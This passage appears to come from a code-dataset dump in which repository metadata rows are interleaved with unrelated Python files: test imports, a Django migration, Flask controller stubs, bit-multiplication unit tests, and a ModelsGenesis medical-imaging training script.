] | null | null | null | events/tests.py | kobihk/lets-meet | b5449b98529dbc80c65a238c6fb415c54b2798b9 | [
"MIT"
] | null | null | null | from .class_tests.event_tests import * # noqa: F403 F401
from .class_tests.participant_test import * # noqa: F403 F401
from .class_tests.meeting_tests import * # noqa: F403 F401
from .class_tests.create_events import * # noqa: F403 F401
| 48.2 | 62 | 0.767635 | 36 | 241 | 4.916667 | 0.361111 | 0.20339 | 0.316384 | 0.40678 | 0.59887 | 0.59887 | 0.59887 | 0.418079 | 0 | 0 | 0 | 0.117073 | 0.149378 | 241 | 4 | 63 | 60.25 | 0.746341 | 0.261411 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2254046be8e1bb718ade07247e9db1ee92d70013 | 206 | py | Python | src/test/__init__.py | HenrikPilz/BMEcatConverter | 28c6840fc70a3f04e3eae5fc7be32c7bc779c1da | [
"BSD-3-Clause"
] | 1 | 2021-03-14T08:20:51.000Z | 2021-03-14T08:20:51.000Z | src/test/__init__.py | HenrikPilz/BMEcatConverter | 28c6840fc70a3f04e3eae5fc7be32c7bc779c1da | [
"BSD-3-Clause"
] | 1 | 2021-11-29T09:56:18.000Z | 2021-12-01T22:01:13.000Z | src/test/__init__.py | HenrikPilz/BMEcatConverter | 28c6840fc70a3f04e3eae5fc7be32c7bc779c1da | [
"BSD-3-Clause"
] | 2 | 2021-08-30T08:14:34.000Z | 2021-09-28T15:10:23.000Z | from test.argumentParserTest import ArgumentParserTest
from test.datamodel import *
from test.handler import *
from test.integration import *
from test.mapping import *
from test.transformer import *
| 29.428571 | 55 | 0.800971 | 25 | 206 | 6.6 | 0.36 | 0.290909 | 0.339394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145631 | 206 | 6 | 56 | 34.333333 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
22733865afa8ebac046cef85960b6c8fcd98b22c | 2,144 | py | Python | georiviere/description/migrations/0007_auto_20210302_1654.py | georiviere/Georiviere-admin | 4ac532f84a7a8fef3e01384fad63e8e288d397c0 | [
"BSD-2-Clause"
] | 7 | 2021-11-05T14:52:25.000Z | 2022-03-24T21:18:02.000Z | georiviere/description/migrations/0007_auto_20210302_1654.py | georiviere/Georiviere-admin | 4ac532f84a7a8fef3e01384fad63e8e288d397c0 | [
"BSD-2-Clause"
] | 57 | 2021-11-02T10:27:34.000Z | 2022-03-31T14:08:32.000Z | georiviere/description/migrations/0007_auto_20210302_1654.py | georiviere/Georiviere-admin | 4ac532f84a7a8fef3e01384fad63e8e288d397c0 | [
"BSD-2-Clause"
] | 1 | 2021-12-05T14:55:42.000Z | 2021-12-05T14:55:42.000Z | # Generated by Django 3.1.7 on 2021-03-02 16:54
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('description', '0006_auto_20210302_1407'),
]
operations = [
migrations.AddField(
model_name='land',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='land',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AddField(
model_name='morphology',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='morphology',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AddField(
model_name='status',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='status',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
migrations.AddField(
model_name='usage',
name='date_insert',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now, verbose_name='Insertion date'),
preserve_default=False,
),
migrations.AddField(
model_name='usage',
name='date_update',
field=models.DateTimeField(auto_now=True, db_index=True, verbose_name='Update date'),
),
]
| 36.338983 | 124 | 0.613806 | 225 | 2,144 | 5.64 | 0.217778 | 0.113475 | 0.144996 | 0.170213 | 0.858944 | 0.858944 | 0.858944 | 0.798266 | 0.798266 | 0.798266 | 0 | 0.019923 | 0.274254 | 2,144 | 58 | 125 | 36.965517 | 0.79563 | 0.020989 | 0 | 0.846154 | 1 | 0 | 0.129709 | 0.010968 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.096154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
227cc822a64cfcfa8bd5b4d670053fd11d643b04 | 257 | py | Python | test/unit/library/test_utils.py | onefinestay/pylytics | b6e77e5d9931244efa6120409a4b97cc73efa4c9 | [
"Apache-2.0"
] | 5 | 2015-04-09T15:52:11.000Z | 2021-07-18T00:19:14.000Z | test/unit/library/test_utils.py | onefinestay/pylytics | b6e77e5d9931244efa6120409a4b97cc73efa4c9 | [
"Apache-2.0"
] | 11 | 2015-02-01T03:56:19.000Z | 2016-07-14T16:07:23.000Z | test/unit/library/test_utils.py | onefinestay/pylytics | b6e77e5d9931244efa6120409a4b97cc73efa4c9 | [
"Apache-2.0"
] | 4 | 2015-02-01T03:53:42.000Z | 2015-08-11T13:14:32.000Z | from pylytics.library.utils import _camel_to_snake, _camel_to_title_case
def test_camel_to_snake():
assert _camel_to_snake('HelloWorld') == 'hello_world'
def test_camel_to_title_case():
assert _camel_to_title_case('HelloWorld') == 'Hello World'
| 25.7 | 72 | 0.785992 | 38 | 257 | 4.736842 | 0.421053 | 0.233333 | 0.2 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116732 | 257 | 9 | 73 | 28.555556 | 0.792952 | 0 | 0 | 0 | 0 | 0 | 0.163424 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.4 | true | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
97f5ab1904673fcf57cabca0fa7d6ad84872e150 | 157 | py | Python | api/database/__init__.py | bymangjo/Metin2_Python_API | c8c42581e0d9eafad5c23053ab286810f7d4eb7a | [
"MIT"
] | null | null | null | api/database/__init__.py | bymangjo/Metin2_Python_API | c8c42581e0d9eafad5c23053ab286810f7d4eb7a | [
"MIT"
] | null | null | null | api/database/__init__.py | bymangjo/Metin2_Python_API | c8c42581e0d9eafad5c23053ab286810f7d4eb7a | [
"MIT"
] | 2 | 2018-10-29T03:29:22.000Z | 2019-11-23T14:12:46.000Z | # __init__.py
from database import communicationmanager
from database import commonmanager
from database import playermanager
from database import logmanager | 31.4 | 41 | 0.878981 | 18 | 157 | 7.444444 | 0.5 | 0.358209 | 0.537313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10828 | 157 | 5 | 42 | 31.4 | 0.957143 | 0.070064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3f593bc31a29e09f65219a4c4e0e4af52c1b7fd5 | 202 | py | Python | packages/auto-nlp-deployment/src/trainings/runtimes/kubernetes/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 4 | 2021-10-05T17:34:02.000Z | 2022-03-23T07:33:19.000Z | packages/auto-nlp-deployment/src/trainings/runtimes/kubernetes/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 11 | 2022-03-01T14:37:52.000Z | 2022-03-31T05:11:23.000Z | packages/auto-nlp-deployment/src/trainings/runtimes/kubernetes/__init__.py | fhswf/tagflip-autonlp | f94abb35ed06198567e5d9cbb7abb7e112149d6c | [
"MIT"
] | 1 | 2022-01-29T13:32:22.000Z | 2022-01-29T13:32:22.000Z | # from .kubernetes_run import KubernetesRun
from .kubernetes_training_runtime import KubernetesTrainingRuntimeEnvironment
from .kubernetes_training_runtime_config import KubernetesTrainingRuntimeConfig
| 50.5 | 79 | 0.915842 | 18 | 202 | 9.944444 | 0.555556 | 0.234637 | 0.24581 | 0.324022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064356 | 202 | 3 | 80 | 67.333333 | 0.94709 | 0.20297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
58ef4b784e5048d71d2bad810af56b35d95c5ae1 | 1,892 | py | Python | python_framework/api/test/apitests/testone/api/src/controller/MyController.py | SamuelJansen/python_framework | a3e57def47c13edd67319f9bbca32be2bbb00f43 | [
"MIT"
] | 5 | 2020-09-02T20:05:44.000Z | 2022-03-04T21:02:13.000Z | python_framework/api/test/apitests/testone/api/src/controller/MyController.py | SamuelJansen/python_framework | a3e57def47c13edd67319f9bbca32be2bbb00f43 | [
"MIT"
] | 1 | 2021-05-23T22:55:58.000Z | 2021-05-24T15:33:50.000Z | python_framework/api/test/apitests/testone/api/src/controller/MyController.py | SamuelJansen/python_framework | a3e57def47c13edd67319f9bbca32be2bbb00f43 | [
"MIT"
] | 3 | 2020-11-01T01:13:09.000Z | 2022-02-22T15:01:19.000Z | from python_framework.api.src.enumeration.HttpStatus import HttpStatus
from python_framework.api.src.service.flask.FlaskManager import Controller, ControllerMethod
@Controller(url='/test-controller', tag='MyUrl', description='My url controller')
class MyController:
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [[dict]],
responseClass = [dict],
logRequest = True,
logResponse = True,
muteStacktraceOnBusinessRuleException = False
)
def post(self, requestBodyList):
return requestBodyList, HttpStatus.OK
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [[dict]],
responseClass = [dict],
logRequest = True,
logResponse = True
)
def patch(self, requestBodyList):
return requestBodyList, HttpStatus.OK
@ControllerMethod(
url = '/all-fine-if-its-none',
logRequest = True,
logResponse = True
)
def get(self):
return None, HttpStatus.OK
@Controller(url='/test-controller/batch', tag='MyUrl', description='My url controller')
class MyBatchController:
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [dict],
responseClass = [[dict]],
logRequest = True,
logResponse = True
)
def post(self, requestBodyList):
return requestBodyList , HttpStatus.OK
@ControllerMethod(
url = '/payload-validation-test',
requestClass = [dict],
responseClass = [[dict]],
logRequest = True,
logResponse = True
)
def patch(self, requestBodyList):
return requestBodyList, HttpStatus.OK
@ControllerMethod(
url = '/all-fine-if-its-none',
logRequest = True,
logResponse = True
)
def get(self):
return [None], HttpStatus.OK
| 28.666667 | 92 | 0.629493 | 167 | 1,892 | 7.11976 | 0.275449 | 0.095879 | 0.126156 | 0.146341 | 0.812447 | 0.770395 | 0.770395 | 0.704794 | 0.704794 | 0.704794 | 0 | 0 | 0.262156 | 1,892 | 65 | 93 | 29.107692 | 0.851719 | 0 | 0 | 0.719298 | 0 | 0 | 0.116279 | 0.084567 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.035088 | 0.105263 | 0.280702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
58f3dbcf759b1e38dd489b313666fbd1e4eca66f | 56 | py | Python | src/visualization/__init__.py | haoranD/CRISP-DM-PYTHON | 7d3675454352aad6b5e1fee9e19f5bd72fa357e4 | [
"MIT"
] | null | null | null | src/visualization/__init__.py | haoranD/CRISP-DM-PYTHON | 7d3675454352aad6b5e1fee9e19f5bd72fa357e4 | [
"MIT"
] | null | null | null | src/visualization/__init__.py | haoranD/CRISP-DM-PYTHON | 7d3675454352aad6b5e1fee9e19f5bd72fa357e4 | [
"MIT"
] | 2 | 2021-11-25T13:33:03.000Z | 2021-12-03T13:47:47.000Z | print('Successfully import all the necessary packages')
| 28 | 55 | 0.821429 | 7 | 56 | 6.571429 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 56 | 1 | 56 | 56 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
453eb1fab235f3e3c711677a39e8979d552bc579 | 5,409 | py | Python | tests/test_multiplication.py | kanicreampasta/pybit-lib | 9f39e0e8cdb519cb830e3af95ad7a4e168909e2f | [
"MIT"
] | 3 | 2021-01-19T08:02:17.000Z | 2021-01-24T13:57:05.000Z | tests/test_multiplication.py | kanicreampasta/pybit-lib | 9f39e0e8cdb519cb830e3af95ad7a4e168909e2f | [
"MIT"
] | 24 | 2020-12-30T14:39:12.000Z | 2021-05-26T08:21:20.000Z | tests/test_multiplication.py | kanicreampasta/pybit-lib | 9f39e0e8cdb519cb830e3af95ad7a4e168909e2f | [
"MIT"
] | null | null | null | import pytest
from pybit.bits import Bits
from pybit.multiplication import Multiplication
def test_booth_primary():
pass
def test_booth_secondary():
A1 = Bits.from_dec(0b010111, 6)
B1 = Bits.from_dec(0b001011, 6)
assert Multiplication.booth_secondary(A1, B1) == [
Bits([1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 1]),
Bits([1, 1, 1, 1, 1, 0, 1, 0, 0, 1, 0, 0]),
Bits([0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1])
]
A2 = Bits.from_dec(0b101111, 6)
B2 = Bits.from_dec(0b011010, 6)
assert Multiplication.booth_secondary(A2, B2) == [
Bits([0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0]),
Bits([0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0]),
Bits([1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0]),
Bits([1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0])
]
def test_booth_tertiary():
A1 = Bits.from_dec(0b101111, 6)
B1 = Bits.from_dec(0b011010, 6)
assert Multiplication.booth_tertiary(A1, B1) == [
Bits([1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]),
Bits([1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0]),
Bits([1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0])
]
A2 = Bits.from_dec(0b101111, 6)
B2 = Bits.from_dec(0b110010, 6)
assert Multiplication.booth_tertiary(A2, B2) == [
Bits([1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]),
Bits([0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0])
]
def test_CLA():
A1 = Bits([1, 0, 1, 1, 1, 1, 0, 1])
B1 = Bits([1, 0, 1, 0, 1, 1, 1, 1])
assert Multiplication.CLA(A1, B1, 0, size=8) == [
Bits([0, 0, 0, 1, 0, 0, 1, 0]),
Bits([1, 0, 1, 0, 1, 1, 0, 1]),
Bits([1, 0, 1, 1, 1, 1, 1, 1]),
Bits([0, 1, 1, 0, 1, 1, 0, 0])
]
A2 = Bits([0, 1, 0, 1, 1, 0, 1, 0])
B2 = Bits([1, 0, 1, 1, 1, 0, 0, 0])
assert Multiplication.CLA(A2, B2, 0, size=8) == [
Bits([1, 1, 1, 0, 0, 0, 1, 0]),
Bits([0, 0, 0, 1, 1, 0, 0, 0]),
Bits([1, 1, 1, 1, 1, 0, 0, 0]),
Bits([0, 0, 0, 1, 0, 0, 1, 0])
]
A3 = Bits([0, 1, 1, 1, 1, 0, 1, 0])
B3 = Bits([1, 0, 1, 1, 1, 0, 1, 1])
assert Multiplication.CLA(A3, B3, 0, size=8) == [
Bits([1, 1, 0, 0, 0, 0, 0, 1]),
Bits([0, 0, 1, 1, 1, 0, 1, 0]),
Bits([1, 1, 1, 1, 1, 0, 1, 0]),
Bits([0, 0, 1, 1, 0, 1, 0, 1])
]
def test_CSA():
X1 = Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
Y1 = Bits([0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0])
Z1 = Bits([1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0])
assert Multiplication.CSA(X1, Y1, Z1, size=12) == [
Bits([1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0]),
Bits([0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0])
]
X2 = Bits([0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0])
Y2 = Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
Z2 = Bits([1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0])
assert Multiplication.CSA(X2, Y2, Z2, size=12) == [
Bits([1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0]),
Bits([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
]
X3 = Bits([1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0])
Y3 = Bits([0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0])
Z3 = Bits([1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 0, 0])
assert Multiplication.CSA(X3, Y3, Z3, size=12) == [
Bits([0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0]),
Bits([1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0])
]
X4 = Bits([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
Y4 = Bits([0, 0, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0])
Z4 = Bits([1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0])
assert Multiplication.CSA(X4, Y4, Z4, size=12) == [
Bits([1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 1, 0]),
Bits([0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0])
]
def test_RCA():
A1 = Bits([1, 1, 0, 1, 0, 0, 1, 0])
B1 = Bits([1, 1, 1, 0, 0, 1, 0, 1])
assert Multiplication.RCA(A1, B1, 1, size=8) == [
Bits([1, 0, 1, 1, 1, 0, 0, 0]),
Bits([1, 1, 0, 0, 0, 1, 1, 1])
]
A2 = Bits([1, 0, 1, 1, 1, 0, 0, 0])
B2 = Bits([1, 1, 1, 0, 1, 1, 0, 0])
assert Multiplication.RCA(A2, B2, 0, size=8) == [
Bits([1, 0, 1, 0, 0, 1, 0, 0]),
Bits([1, 1, 1, 1, 1, 0, 0, 0])
]
def test_partial_product():
A1 = Bits([0, 1, 1, 0, 1, 1])
B1 = Bits([0, 1, 1, 1, 0, 1])
assert Multiplication.partial_product(A1, B1, size=6) == [
Bits([0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0]),
Bits([0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0]),
Bits([0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
]
A2 = Bits([1, 0, 1, 1, 1, 1])
B2 = Bits([0, 1, 1, 0, 1, 0])
assert Multiplication.partial_product(A2, B2, size=6) == [
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
Bits([1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
Bits([1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0]),
Bits([1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0]),
Bits([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]),
]
def test_wallace_tree():
A1 = Bits([0, 1, 1, 0, 1, 1])
B1 = Bits([0, 1, 1, 1, 0, 1])
assert Multiplication.wallace_tree(A1, B1, size=6) == Bits([0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
A2 = Bits([1, 0, 1, 1, 1, 1])
B2 = Bits([0, 1, 1, 0, 1, 0])
assert Multiplication.wallace_tree(A2, B2, size=6) == Bits([1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0])
| 35.585526 | 100 | 0.417268 | 1,162 | 5,409 | 1.917384 | 0.04389 | 0.245063 | 0.241023 | 0.208259 | 0.83079 | 0.714093 | 0.66158 | 0.563285 | 0.495512 | 0.448384 | 0 | 0.273453 | 0.327972 | 5,409 | 151 | 101 | 35.821192 | 0.339477 | 0 | 0 | 0.151515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128788 | 1 | 0.060606 | false | 0.007576 | 0.022727 | 0 | 0.083333 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
18970bb622121bfed9181068f024262643a6ecf3 | 74,123 | py | Python | pytorch/main.py | mistermoutan/ModelsGenesis | 98af7075b93311fe655e9692773eb1ce015b8bd0 | [
"MIT"
] | null | null | null | pytorch/main.py | mistermoutan/ModelsGenesis | 98af7075b93311fe655e9692773eb1ce015b8bd0 | [
"MIT"
] | null | null | null | pytorch/main.py | mistermoutan/ModelsGenesis | 98af7075b93311fe655e9692773eb1ce015b8bd0 | [
"MIT"
] | null | null | null | from warnings import simplefilter
import torch
simplefilter(action="ignore", category=FutureWarning)
import os
from finetune_config import FineTuneConfig
from config import models_genesis_config
from dataset import Dataset
from finetune import Trainer
from evaluate import Tester
from cross_validator import CrossValidator
from feature_extractor import FeatureExtractor
from utils import *
def replication_of_results_pretrain(**kwargs):
config = models_genesis_config(False)
kwargs_dict_ = kwargs["kwargs_dict"]
replace_config_param_attributes(config, kwargs_dict_)
config.display()
save_object(config, "config", config.object_dir)
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.valid_fold]
x_test_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.test_fold] # Don't know what they use this for
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset = Dataset(
config.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is irrelevant here, as it is overwritten by files
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True)
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def resume_replication_of_results_pretrain(run_nr: int, **kwargs):
config = models_genesis_config(False)
kwargs_dict_ = kwargs.get("kwargs_dict", False)
if kwargs_dict_ is not False:
replace_config_param_attributes(config, kwargs_dict_)
config.override_dirs(run_nr) # it's key that object_dir corresponds to the run, so we fetch the correct saved config object
# ensure we are not resuming with a different config
if os.path.isfile(os.path.join(config.object_dir, "config.pkl")):
config = load_object(os.path.join(config.object_dir, "config.pkl")) #!
else:
# not raising an error because some experiments were run before the config object was being saved
print("NO PREVIOUS CONFIG FOUND at {}".format(config.object_dir))
config.resume_ss = True
# config.scheduler_ss = "ReduceLROnPlateau"
config.display()
# for replication the datasets stay the same
x_train_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.train_fold]
x_val_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.valid_fold]
x_test_filenames = ["bat_32_s_64x64x32_" + str(i) + ".npy" for i in config.test_fold] # Don't know what they use this for
files = [x_train_filenames, x_val_filenames, x_test_filenames]
dataset = Dataset(
config.data_dir, train_val_test=(0.8, 0.2, 0), file_names=files
) # train_val_test is irrelevant here, as it is overwritten by files
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(
from_latest_checkpoint=True
) # still requires override dirs to find the specific checkpoint to resume from
trainer_mg_replication.finetune_self_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def replicate_acs_results_fcnresnet18_their_cubes(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = ["lidc_acs_provided"]
split = (0.8, 0.2, 0)
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=False)
dataset.use_acs_paper_transforms = True # !!
config = FineTuneConfig(
data_dir="",
task="REPLICATE_ACS_PAPER_THEIR_EXACT_DATA",
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
)
config.batch_size_sup = 8
config.nb_epoch_sup = 100
config.lr_sup = 0.001
config.milestones = [0.5 * config.nb_epoch_sup, 0.75 * config.nb_epoch_sup]
config.gamma = 0.1
config.scheduler_sup = "MultiStepLR"
# let it run to completion, since patience > nb_epochs
config.patience_sup_terminate = 120
config.from_scratch = True
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True)
trainer_mg_replication.finetune_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
def replicate_acs_results_fcnresnet18_my_cubes(**kwargs):
kwargs_dict_ = kwargs["kwargs_dict"]
dataset_list = ["lidc_80_80_padded"]
split = (0.8, 0.2, 0)
num_cv_folds = kwargs_dict_.get("num_cv_folds", None)
dataset = build_dataset(dataset_list=dataset_list, split=split, two_dimensional_data=False)
dataset.use_acs_paper_transforms = True # !!
config = FineTuneConfig(
data_dir="",
task="REPLICATE_ACS_PAPER",
self_supervised=False,
supervised=True,
model=kwargs_dict_["model"],
)
config.batch_size_sup = 8
config.nb_epoch_sup = 100
config.lr_sup = 0.001
config.milestones = [0.5 * config.nb_epoch_sup, 0.75 * config.nb_epoch_sup]
config.gamma = 0.1
config.scheduler_sup = "MultiStepLR"
# let it run to completion, since patience > nb_epochs
config.patience_sup_terminate = 120
config.from_scratch = True
if num_cv_folds is not None:
cv = get_cross_validator_object_of_task_dir(config.task_dir)
if cv is None:
if config.experiment_nr == 1:
cv = CrossValidator(config, dataset, nr_splits=num_cv_folds)
cv.override_dataset_files_with_splits()
save_object(cv, "cross_validator", config.object_dir)
print("RUN 1: Building cross validator")
else:
print("TOO LATE TO BRING CROSS VALIDATION IN")
else:
cv.set_dataset(dataset)
cv.override_dataset_files_with_splits()
# used splits are popped (and so would be lost), hence the cross validator needs to be re-saved over run 1's objects
save_cross_validator_object_of_task_dir(cv, config.task_dir)
config.display()
save_object(config, "config", config.object_dir)
save_object(dataset, "dataset", config.object_dir)
trainer_mg_replication = Trainer(config, dataset)
trainer_mg_replication.load_model(from_scratch=True)
trainer_mg_replication.finetune_supervised()
trainer_mg_replication.add_hparams_to_writer()
trainer_mg_replication.get_stats()
